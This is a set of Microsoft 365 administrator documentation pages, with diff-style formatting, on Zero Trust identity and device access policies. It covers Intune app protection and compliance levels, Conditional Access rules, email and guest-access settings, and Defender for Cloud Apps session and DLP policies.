-Level 2 maps to what we consider [starting point](#starting-point) or [enterprise](#enterprise) level security, level 3 maps to [specialized](#specialized-security) security.
--- [Level 1 enterprise basic data protection](/mem/intune/apps/app-protection-framework#level-1-enterprise-basic-data-protection) ΓÇô Microsoft recommends this configuration as the minimum data protection configuration for an enterprise device.--- **[Level 2 enterprise enhanced data protection](/mem/intune/apps/app-protection-framework#level-2-enterprise-enhanced-data-protection)** ΓÇô Microsoft recommends this configuration for devices where users access sensitive or confidential information. This configuration is applicable to most mobile users accessing work or school data. Some of the controls may affect user experience.--- **[Level 3 enterprise high data protection](/mem/intune/apps/app-protection-framework#level-3-enterprise-high-data-protection)** ΓÇô Microsoft recommends this configuration for devices run by an organization with a larger or more sophisticated security team, or for specific users or groups who are at uniquely high risk (users who handle highly sensitive data where unauthorized disclosure causes considerable material loss to the organization). An organization likely to be targeted by well-funded and sophisticated adversaries should aspire to this configuration.-
-### Create app protection policies
-
-Create a new app protection policy for each platform (iOS and Android) within Microsoft Intune using the data protection framework settings by:
--- Manually create the policies by following the steps in [How to create and deploy app protection policies with Microsoft Intune](/mem/intune/apps/app-protection-policies).-- Import the sample [Intune App Protection Policy Configuration Framework JSON templates](https://github.com/microsoft/Intune-Config-Frameworks/tree/master/AppProtectionPolicies) with [Intune's PowerShell scripts](https://github.com/microsoftgraph/powershell-intune-samples).-
-## Device compliance policies
-
-Intune device compliance policies define the requirements that devices must meet to be determined as compliant.
-
-You must create a policy for each PC, phone, or tablet platform. This article will cover recommendations for the following platforms:
--- [Android](#enrollment-and-compliance-settings-for-android)-- [iOS/iPadOS](#enrollment-and-compliance-settings-for-iosipados)-- [Windows 10 and later](#recommended-compliance-settings-for-windows-10-and-later)-
-### Create device compliance policies
-
-To create device compliance policies, sign in to the [Microsoft Intune admin center](https://endpoint.microsoft.com), and navigate to **Devices** > **Compliance policies** > **Policies**. Select **Create Policy**.
-
-For step-by-step guidance on creating compliance policies in Intune, see [Create a compliance policy in Microsoft Intune](/mem/intune/protect/create-compliance-policy).
-
-#### Enrollment and compliance settings for iOS/iPadOS
-
-iOS/iPadOS supports several enrollment scenarios, two of which are covered as part of this framework:
--- [Device enrollment for personally owned devices](/mem/intune/enrollment/ios-enroll) ΓÇô these devices are personally owned and used for both work and personal use.-- [Automated device enrollment for corporate-owned devices](/mem/intune/enrollment/device-enrollment-program-enroll-ios) ΓÇô these devices are corporate-owned, associated with a single user, and used exclusively for work and not personal use.-
-Using the principles outlined in [Zero Trust identity and device access configurations](zero-trust-identity-device-access-policies-overview.md):
--- The [starting point](#starting-point) and [enterprise](#enterprise) protection levels map closely with the level 2 enhanced security settings.-- The [specialized](#specialized-security) security protection level maps closely to the level 3 high security settings.-
-##### Compliance settings for personally enrolled devices
--- [Personal basic security (Level 1)](/mem/intune/enrollment/ios-ipados-personal-device-security-configurations#personal-basic-security-level-1) ΓÇô Microsoft recommends this configuration as the minimum security configuration for personal devices where users access work or school data. This configuration is done by enforcing password policies, device lock characteristics, and disabling certain device functions, like untrusted certificates.-- **[Personal enhanced security (Level 2)](/mem/intune/enrollment/ios-ipados-personal-device-security-configurations#personal-enhanced-security-level-2)** ΓÇô Microsoft recommends this configuration for devices where users access sensitive or confidential information. This configuration enacts data sharing controls. This configuration is applicable to most mobile users accessing work or school data on a device.-- **[Personal high security (Level 3)](/mem/intune/enrollment/ios-ipados-personal-device-security-configurations#personal-high-security-level-3)** ΓÇô Microsoft recommends this configuration for devices used by specific users or groups who are uniquely high risk (users who handle highly sensitive data where unauthorized disclosure causes considerable material loss to the organization). This configuration enacts stronger password policies, disables certain device functions, and enforces extra data transfer restrictions.-
-##### Compliance settings for automated device enrollment
--- [Supervised basic security (Level 1)](/mem/intune/enrollment/ios-ipados-supervised-device-security-configurations#supervised-basic-security-level-1) ΓÇô Microsoft recommends this configuration as the minimum security configuration for supervised devices where users access work or school data. This configuration is done by enforcing password policies, device lock characteristics, and disabling certain device functions, like untrusted certificates.-- **[Supervised enhanced security (Level 2)](/mem/intune/enrollment/ios-ipados-supervised-device-security-configurations#supervised-enhanced-security-level-2)** ΓÇô Microsoft recommends this configuration for devices where users access sensitive or confidential information. This configuration enacts data sharing controls and blocks access to USB devices. This configuration is applicable to most mobile users accessing work or school data on a device.-- **[Supervised high security (Level 3)](/mem/intune/enrollment/ios-ipados-supervised-device-security-configurations#supervised-high-security-level-3)** ΓÇô Microsoft recommends this configuration for devices used by specific users or groups who are uniquely high risk (users who handle highly sensitive data where unauthorized disclosure causes considerable material loss to the organization). This configuration enacts stronger password policies, disables certain device functions, enforces extra data transfer restrictions, and requires apps to be installed through Apple's volume purchase program.-
-#### Enrollment and compliance settings for Android
-
-Android Enterprise supports several enrollment scenarios, two of which are covered as part of this framework:
--- [Android Enterprise work profile](/mem/intune/enrollment/android-work-profile-enroll) ΓÇô this enrollment model is typically used for personally owned devices, where IT wants to provide a clear separation boundary between work and personal data. Policies controlled by IT ensure that the work data can't be transferred into the personal profile.-- [Android Enterprise fully managed devices](/mem/intune/enrollment/android-fully-managed-enroll) ΓÇô these devices are corporate-owned, associated with a single user, and used exclusively for work and not personal use.-
-The Android Enterprise security configuration framework is organized into several distinct configuration scenarios, providing guidance for work profile and fully managed scenarios.
-
-Using the principles outlined in [Zero Trust identity and device access configurations](zero-trust-identity-device-access-policies-overview.md):
--- The [starting point](#starting-point) and [enterprise](#enterprise) protection levels map closely with the level 2 enhanced security settings.-- The [specialized](#specialized-security) security protection level maps closely to the level 3 high security settings.-
-##### Compliance settings for Android Enterprise work profile devices
--- Because of the settings available for personally owned work profile devices, there's no basic security (level 1) offering. The available settings don't justify a difference between level 1 and level 2.-- **[Work profile enhanced security (Level 2)](/mem/intune/enrollment/android-work-profile-security-settings#personally-owned-work-profile-enhanced-security)**ΓÇô Microsoft recommends this configuration as the minimum security configuration for personal devices where users access work or school data. This configuration introduces password requirements, separates work and personal data, and validates Android device attestation.-- **[Work profile high security (Level 3)](/mem/intune/enrollment/android-work-profile-security-settings#personally-owned-work-profile-high-security)** ΓÇô Microsoft recommends this configuration for devices used by specific users or groups who are uniquely high risk (users who handle highly sensitive data where unauthorized disclosure causes considerable material loss to the organization). This configuration introduces mobile threat defense or Microsoft Defender for Endpoint, sets the minimum Android version, enacts stronger password policies, and further restricts work and personal separation.-
-##### Compliance settings for Android Enterprise fully managed devices
--- [Fully managed basic security (Level 1)](/mem/intune/enrollment/android-fully-managed-security-settings#fully-managed-basic-security) ΓÇô Microsoft recommends this configuration as the minimum security configuration for an enterprise device. This configuration is applicable to most mobile users accessing work or school data. This configuration introduces password requirements, sets the minimum Android version, and enacts certain device restrictions.-- **[Fully managed enhanced security (Level 2)](/mem/intune/enrollment/android-fully-managed-security-settings#fully-managed-enhanced-security)** ΓÇô Microsoft recommends this configuration for devices where users access sensitive or confidential information. This configuration enacts stronger password policies and disables user/account capabilities.-- **[Fully managed high security (Level 3)](/mem/intune/enrollment/android-fully-managed-security-settings#fully-managed-high-security)** - Microsoft recommends this configuration for devices used by specific users or groups who are uniquely high risk. These users may handle highly sensitive data where unauthorized disclosure may cause considerable material loss to the organization. This configuration increases the minimum Android version, introduces mobile threat defense or Microsoft Defender for Endpoint, and enforces extra device restrictions.-
-#### Recommended compliance settings for Windows 10 and later
-
-The following settings are configured in **Step 2: Compliance settings**, of the [compliance policy creation process for Windows 10 and newer devices](/mem/intune/protect/compliance-policy-create-windows). These settings align with the principles outlined in [Zero Trust identity and device access configurations](zero-trust-identity-device-access-policies-overview.md).
-
-For **Device health > Windows Health Attestation Service evaluation rules**, see this table.
-
-|Property|Value|
-|||
-|Require BitLocker|Require|
-|Require Secure Boot to be enabled on the device|Require|
-|Require code integrity|Require|
-
-For **Device properties**, specify appropriate values for operating system versions based on your IT and security policies.
-
-For **Configuration Manager Compliance**, if you are in a co-managed environment with Configuration Manager select **Require** otherwise select **Not configured**.
-
-For **System security**, see this table.
-
-|Property|Value|
-|||
-|Require a password to unlock mobile devices|Require|
-|Simple passwords|Block|
-|Password type|Device default|
-|Minimum password length|6|
-|Maximum minutes of inactivity before a password is required|15 minutes|
-|Password expiration (days)|41|
-|Number of previous passwords to prevent reuse|5|
-|Require password when device returns from idle state (Mobile and Holographic)|Require|
-|Require encryption of data storage on device|Require|
-|Firewall|Require|
-|Antivirus|Require|
-|Antispyware|Require|
-|Microsoft Defender Antimalware|Require|
-|Microsoft Defender Antimalware minimum version|Microsoft recommends versions no more than five behind from the most recent version.|
-|Microsoft Defender Antimalware signature up to date|Require|
-|Real-time protection|Require|
-
-For **Microsoft Defender for Endpoint**
-
-|Property|Value|
-|||
-|[Require the device to be at or under the machine-risk score](/mem/intune/protect/advanced-threat-protection-configure#create-and-assign-compliance-policy-to-set-device-risk-level)|Medium|
-
-## Conditional Access policies
-
-Once your app protection and device compliance policies are created in Intune, you can enable enforcement with Conditional Access policies.
-
-### Require MFA based on sign-in risk
-
-Follow the guidance in the article [Common Conditional Access policy: Sign-in risk-based multifactor authentication](/entra/identity/conditional-access/howto-conditional-access-policy-risk) to create a policy to require multifactor authentication based on sign-in risk.
-
-When configuring your policy, use the following risk levels.
-
-|Level of protection|Risk level values needed|Action|
-||||
-|Starting point|High, medium|Check both.|
-|Enterprise|High, medium, low|Check all three.|
-
-### Block clients that don't support multifactor authentication
-
-Follow the guidance in the article [Common Conditional Access policy: Block legacy authentication](/entra/identity/conditional-access/howto-conditional-access-policy-block-legacy) to block legacy authentication.
-
-### High risk users must change password
-
-Follow the guidance in the article [Common Conditional Access policy: User risk-based password change](/entra/identity/conditional-access/howto-conditional-access-policy-risk-user) to require users with compromised credentials to change their password.
-
-Use this policy along with [Microsoft Entra password protection](/entra/identity/authentication/concept-password-ban-bad), which detects and blocks known weak passwords and their variants in addition to terms specific to your organization. Using Microsoft Entra password protection ensures that changed passwords are stronger.
-
-### Require approved apps and app protection policies
-
-**You must create a Conditional Access policy** to enforce the app protection policies created in Intune. Enforcing app protection policies requires a Conditional Access policy **and** a corresponding app protection policy.
-
-To create a Conditional Access policy that requires approved apps and APP protection, follow the steps in [Require approved client apps or app protection policy with mobile devices](/entra/identity/conditional-access/howto-policy-approved-app-or-app-protection). This policy only allows accounts within mobile apps protected by app protection policies to access Microsoft 365 endpoints.
-
-Blocking legacy authentication for other client apps on iOS and Android devices ensures that these clients can't bypass Conditional Access policies. If you're following the guidance in this article, you've already configured [Block clients that don't support modern authentication](#block-clients-that-dont-support-multifactor-authentication).
-
-### Require compliant PCs and mobile devices
-
-The following steps will help create a Conditional Access policy to require devices accessing resources be marked as compliant with your organization's Intune compliance policies.
-
-> [!CAUTION]
-> Make sure that your device is compliant before enabling this policy. Otherwise, you could get locked out and be unable to change this policy until your user account has been added to the Conditional Access exclusion group.
-
-1. Sign in to the **Azure portal**.
-1. Browse to **Microsoft Entra ID** > **Security** > **Conditional Access**.
-1. Select **New policy**.
-1. Give your policy a name. We recommend that organizations create a meaningful standard for the names of their policies.
-1. Under **Assignments**, select **Users or workload identities**.
- 1. Under **Include**, select **All users**.
- 1. Under **Exclude**, select **Users and groups** and choose your organization's emergency access or break-glass accounts.
-1. Under **Cloud apps or actions** > **Include**, select **All cloud apps**.
- 1. If you must exclude specific applications from your policy, you can choose them from the **Exclude** tab under **Select excluded cloud apps** and choose **Select**.
-1. Under **Access controls** > **Grant**.
- 1. Select **Require device to be marked as compliant**.
- 1. Select **Select**.
-1. Confirm your settings and set **Enable policy** to **On**.
-1. Select **Create** to create to enable your policy.
-
-> [!NOTE]
-> You can enroll your new devices to Intune even if you select **Require device to be marked as compliant** for **All users** and **All cloud apps** in your policy. **Require device to be marked as compliant** control does not block Intune enrollment and the access to the Microsoft Intune Web Company Portal application.
-
-#### Subscription activation
-
-Organizations using the [Subscription Activation](/windows/deployment/windows-10-subscription-activation) feature to enable users to "step-up" from one version of Windows to another, may want to exclude the Universal Store Service APIs and Web Application, AppID 45a330b1-b1ec-4cc1-9161-9f03992aa49f from their device compliance policy.
-
-### Always require MFA
-
-Follow the guidance in the article [Common Conditional Access policy: Require MFA for all users](/entra/identity/conditional-access/howto-conditional-access-policy-all-users-mfa) to require your specialized security level users to always perform multifactor authentication.
-
-> [!WARNING]
-> When configuring your policy, select the group that requires specialized security and use that **instead of selecting All users**.
-
-## Next steps
-
-[![Step 3: Policies for guest and external users.](../../medi)
-
-[Learn about policy recommendations for guest and external users](zero-trust-identity-device-access-policies-guest-access.md)
security Zero Trust Identity Device Access Policies Exchange https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-exchange.md
- Title: Secure email recommended policies
-description: Describes the policies for Microsoft recommendations about how to apply email policies and configurations.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - remotework
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - highpri
- - tier1
Previously updated : 10/5/2023--
-# Policy recommendations for securing email
-
-This article describes how to implement the recommended Zero Trust identity and device access policies to protect organizational email and email clients that support modern authentication and conditional access. This guidance builds on the [Common identity and device access policies](zero-trust-identity-device-access-policies-common.md) and also includes a few additional recommendations.
-
-These recommendations are based on three different tiers of security and protection that can be applied based on the granularity of your needs: **starting point**, **enterprise**, and **specialized security**. You can learn more about these security tiers and the recommended client operating systems in the [recommended security policies and configurations introduction](zero-trust-identity-device-access-policies-overview.md).
-
-These recommendations require your users to use modern email clients, including Outlook for iOS and Android on mobile devices. Outlook for iOS and Android provide support for the best features of Microsoft 365. These mobile Outlook apps are also architected with security capabilities that support mobile use and work together with other Microsoft cloud security capabilities. For more information, see [Outlook for iOS and Android FAQ](/exchange/clients-and-mobile-in-exchange-online/outlook-for-ios-and-android/outlook-for-ios-and-android-faq).
-
-## Update common policies to include email
-
-To protect email, the following diagram illustrates which policies to update from the common identity and device access policies.
--
-Note the addition of a new policy for Exchange Online to block ActiveSync clients. This policy forces the use of Outlook for iOS and Android on mobile devices.
-
-If you included Exchange Online and Outlook in the scope of the policies when you set them up, you only need to create the new policy to block ActiveSync clients. Review the policies listed in the following table and either make the recommended additions, or confirm that these settings are already included. Each policy links to the associated configuration instructions in [Common identity and device access policies](zero-trust-identity-device-access-policies-common.md).
-
-|Protection level|Policies|More information|
-||||
-|**Starting point**|[Require MFA when sign-in risk is *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include Exchange Online in the assignment of cloud apps|
-||[Block clients that don't support modern authentication](zero-trust-identity-device-access-policies-common.md#block-clients-that-dont-support-multifactor-authentication)|Include Exchange Online in the assignment of cloud apps|
-||[Apply APP data protection policies](zero-trust-identity-device-access-policies-common.md#app-protection-policies)|Be sure Outlook is included in the list of apps. Be sure to update the policy for each platform (iOS, Android, Windows)|
-||[Require approved apps and APP protection](zero-trust-identity-device-access-policies-common.md#require-approved-apps-and-app-protection-policies)|Include Exchange Online in the list of cloud apps|
-||[Block ActiveSync clients](#block-activesync-clients)|Add this new policy|
-|**Enterprise**|[Require MFA when sign-in risk is *low*, *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include Exchange Online in the assignment of cloud apps|
-||[Require compliant PCs *and* mobile devices](zero-trust-identity-device-access-policies-common.md#require-compliant-pcs-and-mobile-devices)|Include Exchange Online in the list of cloud apps|
-|**Specialized security**|[*Always* require MFA](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include Exchange Online in the assignment of cloud apps|
-
-## Block ActiveSync clients
-
-Exchange ActiveSync can be used to synchronize messaging and calendaring data on desktop and mobile devices.
-
-For mobile devices, the following clients are blocked based on the Conditional Access policy created in [Require approved apps and APP protection](zero-trust-identity-device-access-policies-common.md#require-approved-apps-and-app-protection-policies):
--- Exchange ActiveSync clients that use basic authentication.-- Exchange ActiveSync clients that support modern authentication, but don't support Intune app protection policies.-- Devices that support Intune app protection policies, but aren't defined in the policy.-
-To block Exchange ActiveSync connections using basic authentication on other types of devices (for example, PCs), follow the steps in [Block Exchange ActiveSync on all devices](/entra/identity/conditional-access/howto-policy-approved-app-or-app-protection#block-exchange-activesync-on-all-devices).
-
-## Limit access to Exchange Online from Outlook on the web
-
-You can restrict the ability for users to download attachments from Outlook on the web on unmanaged devices. Users on these devices can view and edit these files using Office Online without leaking and storing the files on the device. You can also block users from seeing attachments on an unmanaged device.
-
-Here are the steps:
-
-1. [Connect to Exchange Online PowerShell](/powershell/exchange/exchange-online/connect-to-exchange-online-powershell/connect-to-exchange-online-powershell).
-
-2. Every Microsoft 365 organization with Exchange Online mailboxes has a built-in Outlook on the web (formerly known as Outlook Web App or OWA) mailbox policy named OwaMailboxPolicy-Default. Admins can also [create](/exchange/clients-and-mobile-in-exchange-online/outlook-on-the-web/create-outlook-web-app-mailbox-policy) custom policies.
-
- To see the available Outlook on the web mailbox policies, run the following command:
-
- ```powershell
- Get-OwaMailboxPolicy | Format-Table Name,ConditionalAccessPolicy
- ```
-
-3. To allow viewing attachments but no downloading, run the following command on the affected policies:
-
- ```powershell
- Set-OwaMailboxPolicy -Identity "<PolicyName>" -ConditionalAccessPolicy ReadOnly
- ```
-
- For example:
-
- ```powershell
- Set-OwaMailboxPolicy -Identity "OwaMailboxPolicy-Default" -ConditionalAccessPolicy ReadOnly
- ```
-
-4. To block attachments, run the following command on the affected policies:
-
- ```powershell
- Set-OwaMailboxPolicy -Identity "<PolicyName>" -ConditionalAccessPolicy ReadOnlyPlusAttachmentsBlocked
- ```
-
- For example:
-
- ```powershell
- Set-OwaMailboxPolicy -Identity "OwaMailboxPolicy-Default" -ConditionalAccessPolicy ReadOnlyPlusAttachmentsBlocked
- ```
-
-5. In the Azure portal, [create a new Conditional Access policy](/entra/identity/conditional-access/concept-conditional-access-policies) with these settings:
-
- **Assignments** \> **Users and groups**: Select appropriate users and groups to include and exclude.
-
- **Assignments** \> **Cloud apps or actions** \> **Cloud apps** \> **Include** \> **Select apps**: Select **Office 365 Exchange Online**.
-
- **Access controls** \> **Session**: Select **Use app enforced restrictions**.
-
-## Require that iOS and Android devices must use Outlook
-
-To ensure that iOS and Android devices can access work or school content using Outlook for iOS and Android only, you need a Conditional Access policy that targets those potential users.
-
-See the steps to configure this policy in [Manage messaging collaboration access by using Outlook for iOS and Android](/mem/intune/apps/app-configuration-policies-outlook#apply-conditional-access).
-
-## Set up message encryption
-
-With Microsoft Purview Message Encryption, which uses the protection features in Azure Information Protection, your organization can easily share protected email with anyone on any device. Users can send and receive protected messages with other Microsoft 365 organizations as well as non-customers using Outlook.com, Gmail, and other email services.
-
-For more information, see [Set up Message Encryption](/purview/set-up-new-message-encryption-capabilities).
-
-## Next steps
--
-Configure Conditional Access policies for:
--- [Microsoft Teams](zero-trust-identity-device-access-policies-teams.md)-- [SharePoint](zero-trust-identity-device-access-policies-sharepoint.md)
security Zero Trust Identity Device Access Policies Guest Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-guest-access.md
- Title: Identity and device access policies for allowing guest and external user B2B access - Microsoft 365 for enterprise | Microsoft Docs
-description: Describes the recommended Conditional Access and related policies for protecting access of guests and external users.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - tier2
Previously updated : 1/31/2023--
-# Policies for allowing guest access and B2B external user access
-
-This article discusses adjusting the recommended Zero Trust identity and device access policies to allow access for guests and external users that have a Microsoft Entra Business-to-Business (B2B) account. This guidance builds on the [common identity and device access policies](zero-trust-identity-device-access-policies-common.md).
-
-These recommendations are designed to apply to the **starting point** tier of protection. But you can also adjust the recommendations based on your specific needs for **enterprise** and **specialized security** protection.
-
-Providing a path for B2B accounts to authenticate with your Microsoft Entra tenant doesn't give these accounts access to your entire environment. B2B users and their accounts have access to services and resources, like files, shared with them by Conditional Access policy.
-
-## Updating the common policies to allow and protect guests and external user access
-
-This diagram shows which policies to add or update among the common identity and device access policies, for B2B guest and external user access.
--
-The following table lists the policies you either need to create and update. The common policies link to the associated configuration instructions in the [Common identity and device access policies](zero-trust-identity-device-access-policies-common.md) article.
-
-|Protection level|Policies|More information|
-||||
-|**Starting point**|[Require MFA always for guests and external users](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Create this new policy and configure: <ul><li>For **Assignments > Users and groups > Include**, choose **Select users and groups**, and then select **All guest and external users**.</li><li>For **Assignments > Conditions > Sign-in risk** and select all Sign-in risk levels. </li></ul>|
-||[Require MFA when sign-in risk is *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Modify this policy to exclude guests and external users.|
-
-To include or exclude guests and external users in Conditional Access policies, for **Assignments > Users and groups > Include** or **Exclude**, check **All guest and external users**.
--
-## More information
-
-### Guests and external user access with Microsoft Teams
-
-Microsoft Teams defines the following users:
--- **Guest access** uses a Microsoft Entra B2B account that can be added as a member of a team and have access to the communications and resources of the team.--- **External access** is for an external user that doesn't have a B2B account. External user access includes invitations, calls, chats, and meetings, but doesn't include team membership and access to the resources of the team.-
-For more information, see the [comparison between guests and external user access for teams](/microsoftteams/communicate-with-users-from-other-organizations#compare-external-and-guest-access).
-
-For more information on securing identity and device access policies for Teams, see [Policy recommendations for securing Teams chats, groups, and files](zero-trust-identity-device-access-policies-teams.md).
-
-### Require MFA always for guest and external users
-
-This policy prompts guests to register for MFA in your tenant, regardless of whether they're registered for MFA in their home tenant. Guests and external users accessing resources in your tenant are required to use MFA for every request.
-
-### Excluding guests and external users from risk-based MFA
-
-While organizations can enforce risk-based policies for B2B users using Microsoft Entra ID Protection, there are limitations in the implementation of Microsoft Entra ID Protection for B2B collaboration users in a resource directory because their identity exists in their home directory. Due to these limitations, Microsoft recommends you exclude guests from risk-based MFA policies and require these users to always use MFA.
-
-For more information, see [Limitations of ID Protection for B2B collaboration users](/entra/id-protection/concept-identity-protection-b2b#limitations-of-id-protection-for-b2b-collaboration-users).
-
-### Excluding guests and external users from device management
-
-Only one organization can manage a device. If you don't exclude guests and external users from policies that require device compliance, these policies block these users.
-
-## Next step
--
-Configure Conditional Access policies for:
--- [Microsoft Teams](zero-trust-identity-device-access-policies-teams.md)-- [Exchange Online](zero-trust-identity-device-access-policies-exchange.md)-- [SharePoint](zero-trust-identity-device-access-policies-sharepoint.md)-- [Microsoft Defender for Cloud Apps](zero-trust-identity-device-access-policies-mcas-saas.md)
security Zero Trust Identity Device Access Policies Mcas Saas https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-mcas-saas.md
- Title: Recommended Microsoft Defender for Cloud Apps policies for SaaS apps
-description: Describes recommended policies for integration with Microsoft Defender for Cloud Apps.
---- Previously updated : 1/31/2023---- it-pro-- goldenconfig--- M365-identity-device-management-- m365-security-- zerotrust-solution-- tier2---
-# Recommended Microsoft Defender for Cloud Apps policies for SaaS apps
-
-Microsoft Defender for Cloud Apps builds on Microsoft Entra Conditional Access policies to enable real-time monitoring and control of granular actions with SaaS apps, such as blocking downloads, uploads, copy and paste, and printing. This feature adds security to sessions that carry inherent risk, such as when corporate resources are accessed from unmanaged devices or by guest users.
-
-Defender for Cloud Apps also integrates natively with Microsoft Purview Information Protection, providing real-time content inspection to find sensitive data based on sensitive information types and sensitivity labels and to take appropriate action.
-
-This guidance includes recommendations for these scenarios:
--- Bring SaaS apps into IT management-- Tune protection for specific SaaS apps-- Configure Microsoft Purview data loss prevention (DLP) to help comply with data protection regulations-
-## Bring SaaS apps into IT management
-
-The first step in using Defender for Cloud Apps to manage SaaS apps is to discover these and then add them to your Microsoft Entra tenant. If you need help with discovery, see [Discover and manage SaaS apps in your network](/cloud-app-security/tutorial-shadow-it). After you've discovered apps, [add these to your Microsoft Entra tenant](/entra/identity/enterprise-apps/add-application-portal).
-
-You can begin to manage these by doing the following:
-
-1. First, in Microsoft Entra ID, create a new conditional access policy and configure it to "Use Conditional Access App Control." This redirects the request to Defender for Cloud Apps. You can create one policy and add all SaaS apps to this policy.
-1. Next, in Defender for Cloud Apps, create session policies. Create one policy for each control you want to apply.
-
-Permissions to SaaS apps are typically based on business need for access to the app. These permissions can be highly dynamic. Using Defender for Cloud Apps policies ensures protection to app data, regardless of whether users are assigned to a Microsoft Entra group associated with starting point, enterprise, or specialized security protection.
-
-To protect data across your collection of SaaS apps, the following diagram illustrates the necessary Microsoft Entra Conditional Access policy plus suggested policies you can create in Defender for Cloud Apps. In this example, the policies created in Defender for Cloud Apps apply to all SaaS apps you're managing. These are designed to apply appropriate controls based on whether devices are managed as well as sensitivity labels that are already applied to files.
--
-The following table lists the new conditional access policy you must create in Microsoft Entra ID.
-
-|Protection level|Policy|More information|
-||||
-|All protection levels|[Use Conditional Access App Control in Defender for Cloud Apps](/cloud-app-security/proxy-deployment-aad#configure-integration-with-azure-ad)|This configures your IdP (Microsoft Entra ID) to work with Defender for Cloud Apps.|
-
-This next table lists the example policies illustrated above that you can create to protect all SaaS apps. Be sure to evaluate your own business, security, and compliance objectives and then create policies that provide the most appropriate protection for your environment.
-
-|Protection level|Policy|
-|||
-|Starting point|Monitor traffic from unmanaged devices <p> Add protection to file downloads from unmanaged devices|
-|Enterprise|Block download of files labeled with sensitive or classified from unmanaged devices (this provides browser only access)|
-|Specialized security|Block download of files labeled with classified from all devices (this provides browser only access)|
-
-For end-to-end instructions for setting up Conditional Access App Control, see [Deploy Conditional Access App Control for featured apps](/cloud-app-security/proxy-deployment-aad). This article walks you through the process of creating the necessary conditional access policy in Microsoft Entra ID and testing your SaaS apps.
-
-For more information, see [Protect apps with Microsoft Defender for Cloud Apps Conditional Access App Control](/cloud-app-security/proxy-intro-aad).
-
-## Tune protection for specific SaaS apps
-
-You might want to apply additional monitoring and controls to specific SaaS apps in your environment. Defender for Cloud Apps allows you to accomplish this. For example, if an app like Box is used heavily in your environment, it makes sense to apply more controls. Or, if your legal or finance department is using a specific SaaS app for sensitive business data, you can target extra protection to these apps.
-
-For example, you can protect your Box environment with these types of built-in anomaly detection policy templates:
--- Activity from anonymous IP addresses-- Activity from infrequent country/region-- Activity from suspicious IP addresses-- Impossible travel-- Activity performed by terminated user (requires Microsoft Entra ID as IdP)-- Malware detection-- Multiple failed login attempts-- Ransomware activity-- Risky Oauth App-- Unusual file share activity-
-These are examples. Additional policy templates are added regularly. For examples of how to apply additional protection to specific apps, see [Protecting connected apps](/cloud-app-security/protect-connected-apps).
-
-[How Defender for Cloud Apps helps protect your Box environment](/cloud-app-security/protect-box) demonstrates the types of controls that can help you protect your business data in Box and other apps with sensitive data.
-
-## Configure data loss prevention (DLP) to help comply with data protection regulations
-
-Defender for Cloud Apps can be a valuable tool for configuring protection for compliance regulations. In this case, you create specific policies to look for specific data that a regulation applies to and configure each policy to take appropriate action.
-
-The following illustration and table provide several examples of policies that can be configured to help comply with the General Data Protection Regulation (GDPR). In these examples, policies look for specific data. Based on the sensitivity of the data, each policy is configured to take appropriate action.
--
-|Protection level|Example policies|
-|||
-|Starting point|Alert when files containing this sensitive information type ("Credit Card Number") are shared outside the organization <p> Block downloads of files containing this sensitive information type ("Credit card number") to unmanaged devices|
-|Enterprise|Protect downloads of files containing this sensitive information type ("Credit card number") to managed devices <p> Block downloads of files containing this sensitive information type ("Credit card number") to unmanaged devices <p> Alert when a file with on of these labels is uploaded to OneDrive for Business or Box (Customer data, Human Resources: Salary Data, Human Resources, Employee data)|
-|Specialized security|Alert when files with this label ("Highly classified") are downloaded to managed devices <p> Block downloads of files with this label ("Highly classified") to unmanaged devices|
-
-## Next steps
-
-For more information about using Defender for Cloud Apps, see [Microsoft Defender for Cloud Apps documentation](/defender-cloud-apps/).
security Zero Trust Identity Device Access Policies Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-overview.md
- Title: Zero Trust identity and device access configurations - Microsoft 365 for enterprise
-description: Describes Microsoft recommendations and core concepts for deploying secure email, docs, and apps policies and configurations for Zero Trust.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-overview
- - m365solution-zero-trust
- - zerotrust-solution
- - highpri
- - tier1
Previously updated : 10/10/2023--
-# Zero Trust identity and device access configurations
-
-Today's workforce requires access to applications and resources that exist beyond traditional corporate network boundaries. Security architectures that rely on network firewalls and virtual private networks (VPNs) to isolate and restrict access to resources are no longer sufficient.
-
-To address this new world of computing, Microsoft highly recommends the Zero Trust security model, which is based on these guiding principles:
--- **Verify explicitly**: Always authenticate and authorize based on all available data points. This verification is where Zero Trust identity and device access policies are crucial to sign-in and ongoing validation.-- **Use least privilege access**: Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.-- **Assume breach**: Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.-
-Here's the overall architecture of Zero Trust:
--
-Zero Trust identity and device access policies address the **Verify explicitly** guiding principle for:
--- **Identities**: When an identity attempts to access a resource, verify that identity with strong authentication and ensure that requested access is compliant and typical.-- **Devices (also called endpoints)**: Monitor and enforce device health and compliance requirements for secure access.-- **Applications**: Apply controls and technologies to:
- - Ensure appropriate in-app permissions.
- - Control access based on real-time analytics.
- - Monitor for abnormal behavior
- - Control user actions.
- - Validate secure configuration options.
-
-This series of articles describe a set of identity and device access configurations and policies using Microsoft Entra ID, Conditional Access, Microsoft Intune, and other features. These configurations and policies provide Zero Trust access to Microsoft 365 for enterprise cloud apps and services, other SaaS services, and on-premises applications that are published with Microsoft Entra application proxy.
-
